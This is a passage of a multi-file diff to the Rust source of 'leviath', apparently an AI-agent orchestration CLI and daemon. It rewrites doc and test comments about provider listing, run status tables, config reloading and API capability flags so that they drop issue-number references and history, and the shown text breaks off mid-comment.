--- a/crates/leviath-cli/src/commands/models.rs
+++ b/crates/leviath-cli/src/commands/models.rs
@@ -154,10 +154,9 @@ pub fn builtin_model_windows() -> std::collections::HashMap<(String, String), us
 /// The compiled catalogue as listing rows: what is shown for a provider whose
 /// own listing could not be read.
 ///
-/// One source of truth. This used to be a second table kept by hand in this
-/// file, and its numbers had drifted from the providers' own (`gpt-5.5` was
-/// still marked as taking a temperature here after the provider table learned
-/// it refuses one).
+/// One source of truth: the compiled catalogue, never a second table kept by
+/// hand in this file. A hand-kept copy drifts from the providers' own
+/// capabilities, down to whether a model accepts a temperature.
 fn catalogue_rows() -> Vec<ModelInfo> {
     builtin_catalog()
         .into_iter()
@@ -248,17 +247,16 @@ async fn list_with_registry_within(
     });
 
     // Live by default: each provider's own listing replaces the catalogue's
-    // rows for it. The catalogue is out of date the day it ships (#568), and
-    // a person picking a model from it picked a generation behind what the
-    // gateway served. A provider that cannot be asked keeps its catalogue
+    // rows for it. The catalogue is out of date the day it ships, so a person
+    // picking a model from it alone picks a generation behind what the gateway
+    // serves. A provider that cannot be asked keeps its catalogue
     // rows, and the trailing line says which is which.
     let mut live_providers: Vec<String> = Vec::new();
     if !args.offline {
         registry.prime_capabilities(prime_within, &[]).await;
         // `resolvable_names`, not `provider_names`: a script provider is
         // reachable only through `get`, so a sweep built on the registered
-        // names alone silently omitted every one of them - the same shape as
-        // issues #523 and #531.
+        // names alone silently omits every one of them.
         for provider_name in registry.resolvable_names() {
             // If the caller filtered to a specific provider, skip others.
             if let Some(ref filter) = args.provider
@@ -271,10 +269,10 @@ async fn list_with_registry_within(
             }
 
             // A script name is a candidate until it compiles, so this cannot
-            // assume the lookup succeeds the way the old `provider_names` loop
-            // could. One that will not load is skipped here - the layer has
-            // already logged why - and is only ever fatal when the caller named
-            // it with `--provider`, which is `script_target` above.
+            // assume the lookup succeeds. One that will not load is skipped
+            // here - the layer has already logged why - and is only ever fatal
+            // when the caller named it with `--provider`, which is
+            // `script_target` above.
             let Some(provider) = registry.get(&provider_name) else {
                 continue;
             };
@@ -1918,7 +1916,7 @@ mod tests {
 
     /// The command `rhai-providers.md` prescribes as a provider script's smoke
     /// test: it has to reach the script layer, since the built-in table has no
-    /// row for a provider that names its own models at run time (issue #523).
+    /// row for a provider that names its own models at run time.
     #[tokio::test]
     async fn list_provider_reaches_a_script_provider() {
         let dir = tempfile::tempdir().expect("a temp providers dir");
@@ -1948,9 +1946,9 @@ mod tests {
         .await;
     }
 
-    /// `--remote` sweeps every provider it can resolve, script providers now
-    /// included - the sweep used to be built on `provider_names`, which names
-    /// only the natively registered ones (issues #523, #531).
+    /// `--remote` sweeps every provider it can resolve, script providers
+    /// included: a sweep built on `provider_names` would reach only the
+    /// natively registered ones.
     #[tokio::test]
     async fn list_remote_sweeps_script_providers_too() {
         let dir = tempfile::tempdir().expect("a temp providers dir");

--- a/crates/leviath-cli/src/commands/ps.rs
+++ b/crates/leviath-cli/src/commands/ps.rs
@@ -143,9 +143,9 @@ const OFFLINE_TABLE_LIMIT: usize = 20;
 /// there is no honest way to turn a persisted [`RunStatus`] back into an
 /// `AgentStatus`: `Starting` and `CompleteInteractive` have no counterpart, and
 /// `Idle`/`Active` both collapse to `Running` on the way out. Inventing a live
-/// status for a run nobody is running is the exact kind of convenient lie that
-/// made issue #202 hard to diagnose, so the two sources stay in two arrays, each
-/// honest about where it came from.
+/// status for a run nobody is running is the kind of convenient lie that makes
+/// a listing impossible to diagnose from, so the two sources stay in two
+/// arrays, each honest about where it came from.
 #[derive(Debug, Clone, PartialEq, Serialize, Deserialize)]
 pub(crate) struct OfflineRun {
     /// The run id.
@@ -319,8 +319,7 @@ pub(crate) fn format_offline(runs: &[OfflineRun], now: i64) -> Option<String> {
 /// note that a finished run has nothing to show for itself.
 ///
 /// A run that ends having changed nothing looks identical to a successful one
-/// from the outside, which is how a whole batch of them can go unnoticed - the
-/// failure that produced issue #107 in the first place.
+/// from the outside, which is how a whole batch of them goes unnoticed.
 fn status_cell(entry: &RunListEntry) -> String {
     match (&entry.status, &entry.wait_reason) {
         (AgentStatus::Waiting, Some(reason)) => format!("waiting: {reason}"),
@@ -357,8 +356,7 @@ fn humanize_age(seconds: i64) -> String {
 ///
 /// Three spans, three columns, because they answer three questions and a run can
 /// look very different under each: AGE is how long it has existed, WORK how much
-/// of that it spent working, MOVED how long since it last got anywhere. This
-/// column used to be headed AGE and show what MOVED now shows.
+/// of that it spent working, MOVED how long since it last got anywhere.
 fn age_cell(entry: &RunListEntry, now: i64) -> String {
     match entry.started_at {
         Some(at) => humanize_age(now.saturating_sub(at)),
@@ -396,10 +394,9 @@ fn stage_cell(entry: &RunListEntry) -> String {
 
 /// The providers currently out of service, with why and when each is retried.
 ///
-/// This is the line that would have answered issue #201 on sight. Ten runs
-/// dying in a row produced ten identical error rows and nothing that said "the
-/// OpenRouter account is empty", so the shape of the problem was invisible from
-/// the listing.
+/// Without it, ten runs dying in a row are ten identical error rows with
+/// nothing saying "the OpenRouter account is empty", and the shape of the
+/// problem is invisible from the listing.
 fn providers_footer(health: &DaemonHealth) -> Option<String> {
     if health.providers_down.is_empty() {
         return None;
@@ -447,7 +444,7 @@ fn reads_cell(entry: &RunListEntry) -> String {
 /// Absent while everything is healthy, so an ordinary listing stays a table and
 /// nothing else. A lane at capacity is worth mentioning; a dead-cycle streak is
 /// worth mentioning loudly, because every row above it can look busy while the
-/// factory as a whole has not moved in hours (issue #191).
+/// factory as a whole has not moved in hours.
 fn health_footer(health: &DaemonHealth) -> Option<String> {
     let saturated = health.tools_busy >= health.tools_workers && health.tools_queued > 0;
     if !saturated && health.dead_cycles == 0 {
@@ -479,9 +476,8 @@ fn health_footer(health: &DaemonHealth) -> Option<String> {
 ///
 /// `finished` are runs the daemon has unloaded but still remembers. They are
 /// listed after the live ones rather than left out, because "the run I started
-/// died on its first inference" and "there is no such run" are the two answers
-/// issue #205's scheduler could not tell apart, and an empty table said the
-/// second when it meant the first.
+/// died on its first inference" and "there is no such run" are two different
+/// answers, and an empty table gives the second when it means the first.
 ///
 /// `now` is unix seconds, passed in rather than read here so the output is
 /// deterministic under test.
@@ -495,7 +491,7 @@ pub(crate) fn format_runs(
         // "no agent runs active" on its own is the most misleading thing this
         // command can say while a provider is down: it is what an operator sees
         // once even the finished records have aged out, and it reads as an idle
-        // daemon rather than a factory that cannot start anything (issue #201).
+        // daemon rather than a factory that cannot start anything.
         // Say why the list is empty.
         return match providers_footer(health) {
             Some(footer) => format!("no agent runs active\n\n{footer}"),
@@ -573,8 +569,8 @@ pub(crate) fn format_runs(
         .join("\n");
 
     // The rows that will not move until somebody acts. Worth calling out under
-    // the table: on a wide listing they are easy to miss among the healthy
-    // `waiting: children(n)` rows they used to be indistinguishable from.
+    // the table: on a wide listing they are easy to lose among the healthy
+    // `waiting: children(n)` rows.
     let blocked = runs
         .iter()
         .filter(|e| e.wait_reason.as_ref().is_some_and(|r| r.needs_a_person()))
@@ -708,8 +704,8 @@ fn broken_config_footer(path: &std::path::Path) -> Option<String> {
 /// polling on an interval will eventually catch the daemon restarting, and the
 /// whole point of the flag is to be the thing it reconciles against: failing
 /// there, or reporting an empty live set, would tell it every run had died at
-/// once. Without `--all` the old behavior stands, because a listing of live runs
-/// with no daemon to list them is simply an error.
+/// once. Without `--all` an unreachable daemon is fatal, because a listing of
+/// live runs with no daemon to list them is simply an error.
 pub async fn send_list(client: &ControlClient, args: &PsArgs) -> anyhow::Result<()> {
     let now = chrono::Utc::now().timestamp();
     match (client.list().await, args.all) {

--- a/crates/leviath-cli/src/commands/ps/tests.rs
+++ b/crates/leviath-cli/src/commands/ps/tests.rs
@@ -169,7 +169,7 @@ fn the_offline_cell_marks_a_degraded_fan_out_too() {
 }
 
 /// A run that finished with nothing to show for it reads that way, instead of
-/// being indistinguishable from one that did the work (issue #192).
+/// being indistinguishable from one that did the work.
 #[test]
 fn status_cell_marks_a_finished_run_that_produced_nothing() {
     let mut e = entry("r", AgentStatus::Complete);
@@ -312,10 +312,10 @@ fn format_runs_handles_empty() {
     );
 }
 
-/// Issue #205: a scheduler spawns a run, the run dies on its first inference,
-/// and the daemon unloads it. Nothing is running, but "no agent runs active" is the
-/// answer that cost forty minutes of spawn-and-revert, because it reads exactly
-/// like a run that was never spawned. The row has to be there, with the reason.
+/// A scheduler spawns a run, the run dies on its first inference, and the
+/// daemon unloads it. Nothing is running, but "no agent runs active" reads
+/// exactly like a run that was never spawned, so the caller retries forever.
+/// The row has to be there, with the reason.
 #[test]
 fn format_runs_shows_a_finished_run_when_nothing_is_running() {
     let mut died = entry(
@@ -603,7 +603,7 @@ fn the_footer_and_the_answer_call_out_coexist() {
     assert!(out.contains("no progress for 2 cycles"), "{out}");
 }
 
-// ── providers out of service (issue #201) ─────────────────────────────────
+// ── providers out of service ──────────────────────────────────────────────
 
 fn down(provider: &str, reason: leviath_providers::UnavailableReason) -> ProviderCircuitState {
     ProviderCircuitState {

--- a/crates/leviath-cli/src/commands/run/session.rs
+++ b/crates/leviath-cli/src/commands/run/session.rs
@@ -239,7 +239,7 @@ pub(crate) fn build_provider_registry_from_config_probing(
 ///
 /// The daemon builds its registry this way so an edit to
 /// `[model_providers.<name>]` reaches the next provider load with no restart,
-/// matching the `.rhai` file's own hot-reload (issue #533). Short-lived
+/// matching the `.rhai` file's own hot-reload. Short-lived
 /// processes keep the snapshot: there is nothing to reload inside one command.
 pub(crate) fn build_provider_registry_live(
     config: &Config,
@@ -326,8 +326,7 @@ pub(crate) fn script_provider_config(
 
 /// A script-provider config source that follows `reloader`, so an edit to
 /// `[model_providers.<name>]` reaches the next provider load without a daemon
-/// restart - the same way an edit to the `.rhai` file beside it already did
-/// (issue #533).
+/// restart - the same way an edit to the `.rhai` file beside it does.
 ///
 /// Memoised on the identity of the config the reloader hands back, which is a
 /// requirement rather than an optimisation: the layer's cache compares its
@@ -822,8 +821,8 @@ mod tests {
 
     // ─── ProviderCreds seam ─────────────────────────────────────────────
 
-    /// The cache TTL reaches the provider through the creds, which is the whole
-    /// path #345 was missing: the enum existed and nothing could select it.
+    /// The cache TTL reaches the provider through the creds. Without that leg
+    /// the enum exists and nothing can select it.
     #[test]
     fn provider_creds_carry_the_anthropic_cache_ttl() {
         use leviath_providers::anthropic::CacheTtl;

--- a/crates/leviath-cli/src/commands/run/task.rs
+++ b/crates/leviath-cli/src/commands/run/task.rs
@@ -40,8 +40,8 @@ pub(crate) fn resolve_task(
 /// whitespace anywhere, and either a path separator or a `~` home prefix.
 ///
 /// This exists so a mistyped filename fails instead of silently becoming the
-/// agent's entire task, which is what `lev run coder -t ./promt.md` used to do:
-/// a real run, real tokens, and a transcript whose only instruction was an
+/// agent's entire task: `lev run coder -t ./promt.md` would otherwise be a
+/// real run, real tokens, and a transcript whose only instruction is an
 /// eleven-character string. Prompt text that happens to mention a path ("fix
 /// src/main.rs") always has spaces, so it never trips this.
 ///

--- a/crates/leviath-cli/src/commands/serve/agents.rs
+++ b/crates/leviath-cli/src/commands/serve/agents.rs
@@ -114,9 +114,8 @@ pub(super) async fn spawn_agent(
         Ok(ControlResponse::Spawned { run_id }) => {
             // No `AgentSpawned` from here. The daemon's change-detection pass
             // emits one for every run the world gains, however it was
-            // launched, and this route used to emit a second for its own - so
-            // a subscriber saw the run appear twice, and only ever for the
-            // runs that came in through HTTP.
+            // launched, so a second one from here would make exactly the runs
+            // that arrived over HTTP appear twice to a subscriber.
             tracing::info!(run_id = %run_id, blueprint = %body.blueprint, "spawned agent via API");
             Ok(Json(SpawnAgentResp {
                 agent_id: run_id.clone(),
@@ -429,9 +428,9 @@ pub(super) async fn agent_file(
     }
 
     let size = match std::fs::metadata(&resolved) {
-        // A directory used to be a 400. It is the natural way to ask "what is
-        // in here", and the folder picker already answers that shape, so it
-        // lists instead. Nothing can have depended on the old error.
+        // A directory is the natural way to ask "what is in here", and the
+        // folder picker already answers that shape, so it lists instead of
+        // refusing.
         Ok(m) if m.is_dir() => {
             return list_run_files(&meta, FileSource::Workdir, Some(&resolved), query.hidden)
                 .map(Json);
@@ -1335,11 +1334,9 @@ system_prompt = "Plan the work"
                     .await
                     .unwrap();
                 let runs: Vec<RunMeta> = serde_json::from_slice(&body).unwrap();
-                // The run we created has Running status
                 let found = runs.iter().any(|r| r.run_id == run_id);
                 assert_found_running_run(found);
 
-                // Cleanup
                 let _ = std::fs::remove_dir_all(runstate::run_dir(&run_id));
             },
         )
@@ -1611,7 +1608,6 @@ system_prompt = "Plan the work"
                 let meta = make_run(&run_id);
                 create_run(&meta).unwrap();
 
-                // Write a context snapshot
                 let snap = runstate::ContextSnapshot {
                     stage_name: "plan".to_string(),
                     total_tokens: 5000,
@@ -1925,8 +1921,9 @@ system_prompt = "Plan the work"
                 .unwrap();
                 runstate::append_stage_output(&run_id, 0, "from the planning stage");
                 runstate::append_stage_output(&run_id, 1, "from the coding stage");
-                // The path the handler used to read. Nothing writes it in
-                // production; planting it here proves the handler stopped.
+                // A run-level `output.log` is not a log source. Nothing
+                // writes it in production; planting it here proves the
+                // handler reads only the stage files.
                 std::fs::write(
                     runstate::run_dir(&run_id).join("output.log"),
                     "the dead run-level file",
@@ -2598,9 +2595,8 @@ system_prompt = "Plan the work"
     }
 
     #[tokio::test]
-    /// A directory used to be a 400. Asking for one is the natural way to say
-    /// "what is in here", so it lists instead - the behavior change this route
-    /// deliberately makes.
+    /// Asking for a directory is the natural way to say "what is in here", so
+    /// the route lists it rather than refusing.
     async fn agent_file_directory_lists_instead_of_erroring() {
         crate::runstate::with_isolated_runs_dir_async(
             "agent_file_directory_lists",
@@ -2909,7 +2905,6 @@ system_prompt = "Plan the work"
                 meta.status = RunStatus::Complete;
                 create_run(&meta).unwrap();
 
-                // Write some output.log content
                 let log_path = runstate::run_dir(&run_id).join("output.log");
                 std::fs::write(&log_path, "task complete\n").unwrap();
 
@@ -2945,7 +2940,6 @@ system_prompt = "Plan the work"
                 let meta = make_run(&run_id);
                 create_run(&meta).unwrap();
 
-                // Write a stages index and stage output
                 let stages = vec![runstate::StageRecord::new("plan".to_string(), 0)];
                 runstate::write_stages_index(&run_id, &stages).unwrap();
                 runstate::append_stage_output(&run_id, 0, "stage output here");
@@ -3400,7 +3394,7 @@ system_prompt = "Plan the work"
         .await;
     }
 
-    // ─── GET /api/agents/{id}/stages (#388) ──────────────────────────────────
+    // ─── GET /api/agents/{id}/stages ─────────────────────────────────────────
 
     /// Build a ledger with one stage that ran, one the run stepped over, and
     /// one still ahead of it.
@@ -3479,7 +3473,7 @@ system_prompt = "Plan the work"
         .await;
     }
 
-    /// The price beside the tokens, and the split by visit beneath it (#630).
+    /// The price beside the tokens, and the split by visit beneath it.
     ///
     /// A console drawing a run's graph annotates each node with what it cost.
     /// Without these it could annotate time and nothing else, and the obvious

--- a/crates/leviath-cli/src/commands/serve/blueprints.rs
+++ b/crates/leviath-cli/src/commands/serve/blueprints.rs
@@ -2046,7 +2046,6 @@ system_prompt = "Do work"
             agent_paths: vec![dir.path().to_path_buf()],
             ..Default::default()
         };
-        // Should not panic even with empty dirs
         let blueprints = discover_blueprints(&config);
         // May include blueprints from ~/.leviath/agents, but no crash
         let _ = blueprints;
@@ -2058,7 +2057,6 @@ system_prompt = "Do work"
             agent_paths: vec![PathBuf::from("/nonexistent/path/unlikely_to_exist_12345")],
             ..Default::default()
         };
-        // Should not panic
         let _ = discover_blueprints(&config);
     }
 

--- a/crates/leviath-cli/src/commands/serve/config.rs
+++ b/crates/leviath-cli/src/commands/serve/config.rs
@@ -72,7 +72,7 @@ fn redact(
 
 /// `GET /api/config`. Reads the file rather than a start-up copy, so an edit
 /// made through [`put_config`] - or by anything else on the machine - is
-/// visible to the very next request (issue #532).
+/// visible to the very next request.
 pub(super) async fn get_config(State(state): State<AppState>) -> Json<RedactedConfig> {
     // One `health()` call rather than a `current_config()` beside it: health
     // re-checks the file itself and hands back the config in force with its
@@ -84,7 +84,7 @@ pub(super) async fn get_config(State(state): State<AppState>) -> Json<RedactedCo
 }
 
 /// `PUT /api/config` (admin-only). Loads the on-disk config, applies every
-/// present field, and writes it back with the file's `0600` permissions — the
+/// present field, and writes it back with the file's `0600` permissions - the
 /// same file `lev setup` and MCP admin edits. Returns the new redacted config.
 pub(super) async fn put_config(
     State(state): State<AppState>,
@@ -271,8 +271,8 @@ fn validate_key_format(provider: &str, key: &str) -> (bool, Option<String>) {
             }
         }
         // A custom gateway is custom precisely because its key has no house
-        // format to check, so an unknown name is no longer a rejection: the
-        // only thing that can be said about the key is that it is not empty.
+        // format to check, so an unknown name is not a rejection: the only
+        // thing that can be said about the key is that it is not empty.
         _ => match key.trim().is_empty() {
             true => (false, Some("Key must not be empty.".to_string())),
             false => (true, None),
@@ -352,12 +352,11 @@ pub(crate) async fn list_model_ids(
 /// the dashboard's agent editor alike.
 ///
 /// Iterates `resolvable_names` rather than `provider_names`, so a Rhai script
-/// provider is asked too. It used to be skipped here: `provider_names` returns
-/// natively registered providers only, and a script provider is reachable only
-/// through `get`. The result was that The Lair listed a script provider under
-/// its gateways while offering none of its models, on the new-run page, in the
-/// agent editor and in settings alike (issue #531 - the same defect #523 fixed
-/// for the CLI).
+/// provider is asked too. `provider_names` returns natively registered
+/// providers only, and a script provider is reachable through `get` alone, so
+/// iterating that instead lists a script provider under the gateways while
+/// offering none of its models - on the new-run page, in the agent editor and
+/// in settings alike.
 pub(super) async fn list_models_from_config(
     config: &crate::config::Config,
     build_client: leviath_providers::provider::HttpClientFactory<'_>,
@@ -477,22 +476,16 @@ mod tests {
         crate::daemon::config_reload::ConfigReloader::fixed(Config::default()).health()
     }
 
-    /// A default config whose ollama endpoint cannot answer.
+    /// A config with a registered provider whose `list_models` cannot succeed,
+    /// which is the `Err` arm of the handler's `if let Ok(list)`.
     ///
-    /// Ollama is always registered, so on a machine running `ollama serve` its
-    /// `list_models` *succeeds* and the `if let Ok(list)` in `models_with` never
-    /// takes its other arm - which made `cargo xtask coverage --package
-    /// leviath-cli` fail locally while passing in CI, where nothing is
-    /// listening. Port 1 is reserved and never bound, so the result stops
-    /// depending on what happens to be running on the developer's machine.
-    /// A registered provider whose `list_models` cannot succeed, which is the
-    /// `Err` arm of the handler's `if let Ok(list)`.
-    ///
-    /// It used to be Ollama pointed at a dead port, but Ollama now registers
-    /// only when something answers there - so a dead address means no provider
-    /// at all, and the arm went unrun. A keyed provider is the reliable way to
-    /// put something in the registry that will then fail to list: the key
-    /// registers it, and nothing is listening at the address it calls.
+    /// A keyed provider is the reliable way to put something in the registry
+    /// that will then fail to list: the key registers it, and nothing is
+    /// listening at the address it calls. Ollama will not do, because it
+    /// registers only when something answers there, so a dead address leaves
+    /// no provider at all and the arm goes unrun. Port 1 is reserved and never
+    /// bound, so the result does not depend on what happens to be running on
+    /// the developer's machine.
     fn state_without_a_reachable_ollama() -> AppState {
         let (tx, _) = broadcast::channel::<ServerEvent>(64);
         AppState {
@@ -583,9 +576,9 @@ mod tests {
         assert!(config.ollama_base_url.is_none());
     }
 
-    /// A broken save is the one thing this route could not previously say. It
-    /// kept answering with the last good config, which reads exactly like an
-    /// edit that was never made.
+    /// A config that does not parse is reported alongside the last good one.
+    /// The config on its own reads exactly like an edit that was never made,
+    /// so the error is the only thing that tells the two apart.
     #[tokio::test]
     async fn get_config_reports_a_broken_file_and_keeps_serving_the_last_good_one() {
         let dir = tempfile::tempdir().unwrap();
@@ -658,9 +651,9 @@ mod tests {
         serde_json::from_slice(&body).unwrap()
     }
 
-    /// The console used to feature-detect by calling a route and reading a 404
-    /// as "unsupported" - which is also what a missing run looks like, and
-    /// costs one round trip per feature.
+    /// Without these a console feature-detects by asking for something and
+    /// reading a 404 as "unsupported" - which is also what a missing run looks
+    /// like, and costs one round trip per feature.
     #[tokio::test]
     async fn get_config_advertises_the_api_version_capabilities_and_limits() {
         let app = Router::new()
@@ -858,7 +851,7 @@ mod tests {
 
     /// A script provider's models must reach `GET /api/models`, or The Lair
     /// lists the gateway under settings while offering none of its models on
-    /// the new-run page or in the agent editor (issue #531).
+    /// the new-run page or in the agent editor.
     ///
     /// A real `.rhai` on disk under an isolated `LEVIATH_HOME`, not a mock:
     /// the endpoint builds its own registry, so the only way to put a script
@@ -988,8 +981,7 @@ mod tests {
 
     /// [`state_with_config_path`], but its config source *watches* that file
     /// rather than holding a copy - the way `lev serve` builds one. What the
-    /// handlers see is then whatever is on disk, which is the whole point of
-    /// issue #532.
+    /// handlers see is then whatever is on disk.
     fn state_watching_config_path(path: std::path::PathBuf) -> (AppState, AdminPaths) {
         let (tx, _) = broadcast::channel::<ServerEvent>(64);
         let state = AppState {
@@ -1038,10 +1030,9 @@ mod tests {
         serde_json::from_slice(&body).expect("the endpoint answers with JSON")
     }
 
-    /// The round trip issue #532 is about: save an edit, reload the page, and
-    /// the edit is still there. `put_config` writes the file and `get_config`
-    /// used to answer from a start-up copy, so the second half showed the old
-    /// value and the save read as lost.
+    /// The round trip: save an edit, reload the page, and the edit is still
+    /// there. `put_config` writes the file, so `get_config` has to read the
+    /// file back and not a start-up copy, or the save reads as lost.
     #[tokio::test]
     async fn an_edit_through_put_is_visible_to_the_next_get() {
         let dir = tempfile::tempdir().unwrap();
@@ -1670,11 +1661,10 @@ mod tests {
     #[tokio::test]
     async fn the_models_endpoint_is_empty_when_no_https_client_can_be_built() {
         // A keyed provider, so something actually asks for a client and the
-        // failing factory has a request to fail. Ollama used to be that
-        // something - it needed no key and so always reached the client cache -
-        // but it now registers only when its address answers, and on a machine
-        // without it nothing requested a client, no error was produced, and
-        // this test passed while exercising none of what it is named for.
+        // failing factory has a request to fail. Ollama will not do: it
+        // registers only when its address answers, so on a machine without it
+        // nothing asks for a client, no error is produced, and this test
+        // passes while exercising none of what it is named for.
         let (tx, _) = broadcast::channel::<ServerEvent>(64);
         let state = AppState {
             update_check: Default::default(),

--- a/crates/leviath-cli/src/commands/serve/config_types.rs
+++ b/crates/leviath-cli/src/commands/serve/config_types.rs
@@ -124,12 +124,12 @@ pub(super) const API_CAPABILITIES: &[&str] = &[
     "runs.files.workdir",
     "runs.stages",
     // `cost_usd`, `unpriced_calls` and `cost_is_exact` on each stage record, and
-    // the `visits` split beneath them. The tokens were always there and the
-    // price was not, so a console drawing a run's graph could annotate a node
-    // with how long it took and not with what it cost - and the obvious
-    // workaround, multiplying tokens by a rate card of its own, produces a
-    // fourth answer that disagrees with the run's, the provider's and this
-    // one's (#630). Announced because a missing field must not read as a zero:
+    // the `visits` split beneath them. Without the price a console drawing a
+    // run's graph can annotate a node with how long it took and not with what
+    // it cost, and the obvious workaround, multiplying tokens by a rate card
+    // of its own, produces a fourth answer that disagrees with the run's, the
+    // provider's and this one's. Announced because a missing field must not
+    // read as a zero:
     // an older daemon serves stage records with no cost at all, and `null`
     // there means unknown for a different reason than it does here.
     "runs.stages.cost",
@@ -150,9 +150,9 @@ pub(super) const API_CAPABILITIES: &[&str] = &[
     "events.waiting_on",
     // Stage transitions and tool call start/finish as first-class frames
     // (`stage_transition`, `tool_call_started`, `tool_call_finished`) rather
-    // than wrapped in the untyped `world` envelope they used to ride. Breaking
-    // for a client that matched on `world`, which is why it is announced at
-    // all rather than left for a client to discover.
+    // than wrapped in the untyped `world` envelope. Breaking for a client that
+    // matches on `world`, which is why it is announced at all rather than left
+    // for a client to discover.
     "events.stage_and_tool",
     // `parent_id` on `agent_spawned` names the run that spawned a sub-agent, so
     // a console can place a fan-out worker in the tree the moment it starts
@@ -165,11 +165,11 @@ pub(super) const API_CAPABILITIES: &[&str] = &[
     // that poll where the daemon has it and keep it where it does not.
     "events.title",
     // `cost_usd` and `subtree_cost_usd` on the agent tree routes. A sub-agent's
-    // cost is on the sub-agent's own record, so answering "what did this run
-    // cost" used to mean walking every descendant and reading each one - the walk
-    // that gets skipped, and skipping it understates a fan-out badly. Announced
-    // so a console can tell a daemon that answers this from one that does not,
-    // rather than reading a missing field as a zero.
+    // cost is on the sub-agent's own record, so without these, answering "what
+    // did this run cost" means walking every descendant and reading each one -
+    // the walk that gets skipped, and skipping it understates a fan-out badly.
+    // Announced so a console can tell a daemon that answers this from one that
+    // does not, rather than reading a missing field as a zero.
     "runs.cost",
     // The `agent_spend` frame, sent while a run is still going when its spend
     // passes a figure named in `[limits] notify_spend_usd`. Additive - a client
@@ -181,8 +181,8 @@ pub(super) const API_CAPABILITIES: &[&str] = &[
     // `agent_completed` carry the same word a run carries - `running`,
     // `waiting_input` - instead of the engine's own `idle`/`active`/`waiting`,
     // and the three routes that rendered a status through `Display`
-    // (`GET /api/agents/{id}/result` and the two tree routes) now spell it the
-    // way every other route does.
+    // (`GET /api/agents/{id}/result` and the two tree routes) spell it the way
+    // every other route does.
     //
     // Breaking for a client matching on the old words, which is why it is
     // announced rather than left to be discovered: a console can read this and
@@ -437,7 +437,7 @@ pub(super) struct ProbeModelsResp {
     pub(super) models: Vec<String>,
 }
 
-/// Body of `POST /api/config/validate` — a format-only key check (no network,
+/// Body of `POST /api/config/validate` - a format-only key check (no network,
 /// no persistence), mirroring the `lev setup` wizard's inline validation.
 #[derive(Debug, Deserialize)]
 pub(super) struct ValidateKeyReq {

--- a/crates/leviath-cli/src/commands/serve/doctor.rs
+++ b/crates/leviath-cli/src/commands/serve/doctor.rs
@@ -17,10 +17,10 @@ use crate::commands::run::session::build_provider_registry_from_config;
 
 /// `GET /api/doctor`: the checks that cost nothing.
 ///
-/// Config, search and resolve, then stop: exactly `lev doctor --offline`. It
-/// used to run the whole chain, which made an unauthenticated-looking read
-/// into two billed provider calls and a spawned run for anyone holding the
-/// bearer token, on every press of a button.
+/// Config, search and resolve, then stop: exactly `lev doctor --offline`.
+/// Running the whole chain here would turn a read into two billed provider
+/// calls and a spawned run for anyone holding the bearer token, on every press
+/// of a button.
 ///
 /// A failing check is an `ok: false` entry in a 200, never an HTTP error - the
 /// endpoint answering at all is not the thing being diagnosed. The config is

--- a/crates/leviath-cli/src/commands/serve/event_seam_tests.rs
+++ b/crates/leviath-cli/src/commands/serve/event_seam_tests.rs
@@ -2,14 +2,13 @@
 //!
 //! # Why this file exists
 //!
-//! Every link in the event chain had a test, and none of them joined. A real
-//! `WorldHost` emitting world events was covered in `host_tests.rs`; a *fake*
-//! daemon feeding `polling.rs` was covered there; a hand-constructed
-//! `ServerEvent` reaching a real websocket was covered in `websocket.rs`. So a
+//! Every link in the event chain has a test of its own, and none of them join.
+//! A real `WorldHost` emitting world events is covered in `host_tests.rs`; a
+//! *fake* daemon feeding `polling.rs` is covered there; a hand-constructed
+//! `ServerEvent` reaching a real websocket is covered in `websocket.rs`. So a
 //! break at any seam between them - a variant the gateway forgot to map, a
 //! change-detection pass that stopped running, an event the control socket
-//! dropped - would pass the whole suite. Issue #502 was filed claiming exactly
-//! that had happened. It had not, and nothing in the tree could say so.
+//! dropped - would pass the whole suite with nothing left to catch it.
 //!
 //! This drives the production chain end to end: `build_host` builds the same
 //! host the daemon runs, `handle_connection_as` serves the same control socket,
@@ -256,9 +255,8 @@ fn last<'a>(frames: &'a [serde_json::Value], tag: &str) -> &'a serde_json::Value
 
 /// The whole chain, asserted on the frames a subscriber actually receives.
 ///
-/// This is the test issue #502 asked for. Its claim was that a run's status and
-/// token changes have no producer, so no client can see them; what settles that
-/// is a real run over a real socket, not a grep.
+/// Whether a run's status and token changes reach a client is settled by a
+/// real run over a real socket, not by a grep for a producer.
 #[tokio::test]
 async fn a_real_run_reaches_a_websocket_subscriber() {
     let agent_dir = tempfile::tempdir().expect("agent dir");
@@ -311,11 +309,10 @@ async fn a_real_run_reaches_a_websocket_subscriber() {
     assert_eq!(spawned["blueprint"], "seam");
     assert_eq!(spawned["parent_id"], serde_json::Value::Null);
 
-    // The frame issue #502 says cannot exist. Its fields are asserted, not just
-    // its tag: a status with no stage tells a console nothing. And the run
-    // moved more than once, which is the other half of the claim - a client
-    // that only ever hears one status has no more than it would have got from
-    // the spawn.
+    // The status frames. Their fields are asserted, not just the tag: a status
+    // with no stage tells a console nothing. And the run moved more than once,
+    // because a client that only ever hears one status has no more than it
+    // would have got from the spawn.
     let statuses: Vec<&serde_json::Value> = frames
         .iter()
         .filter(|f| tag_of(f) == "agent_status")

--- a/crates/leviath-cli/src/commands/serve/mod.rs
+++ b/crates/leviath-cli/src/commands/serve/mod.rs
@@ -543,10 +543,10 @@ async fn execute_with_shutdown(
     let addr: SocketAddr = format!("{}:{}", args.host, args.port).parse()?;
     let scheme = tls::scheme(tls.as_ref());
 
-    // Bound before anything says it is listening. Announcing first meant a
-    // taken port printed "Leviath API server listening on http://127.0.0.1:3000"
-    // and *then* died on a bare `os error 48`, which reads as a server that
-    // started and crashed rather than one that never started (issue #586).
+    // Bound before anything says it is listening. Announcing first would print
+    // "Leviath API server listening on http://127.0.0.1:3000" on a taken port
+    // and *then* die on a bare `os error 48`, which reads as a server that
+    // started and crashed rather than one that never started.
     let listener = tokio::net::TcpListener::bind(addr)
         .await
         .map_err(|e| bind_error(&e, &args.host, args.port))?;
@@ -583,8 +583,8 @@ async fn execute_with_shutdown(
 ///
 /// The default port is 3000, which collides with most of the JavaScript world
 /// and a fair number of agent runtimes, so "the port is taken" is the ordinary
-/// failure here rather than an exotic one. It used to surface as a bare
-/// `os error 48` / `os error 10048` with no mention of the flag that fixes it.
+/// failure here rather than an exotic one, and a bare `os error 48` /
+/// `os error 10048` says nothing about the flag that fixes it.
 ///
 /// Deliberately does not fall back to another port. The console at
 /// leviath.dev polls a fixed `http://127.0.0.1:3000`, so a server that quietly
@@ -1262,9 +1262,8 @@ mod tests {
         // the router's own catch-all has nothing to say. (The handler's real
         // behavior is covered in agents.rs.)
         //
-        // `path` used to be required, and the resulting 400 was the proof.
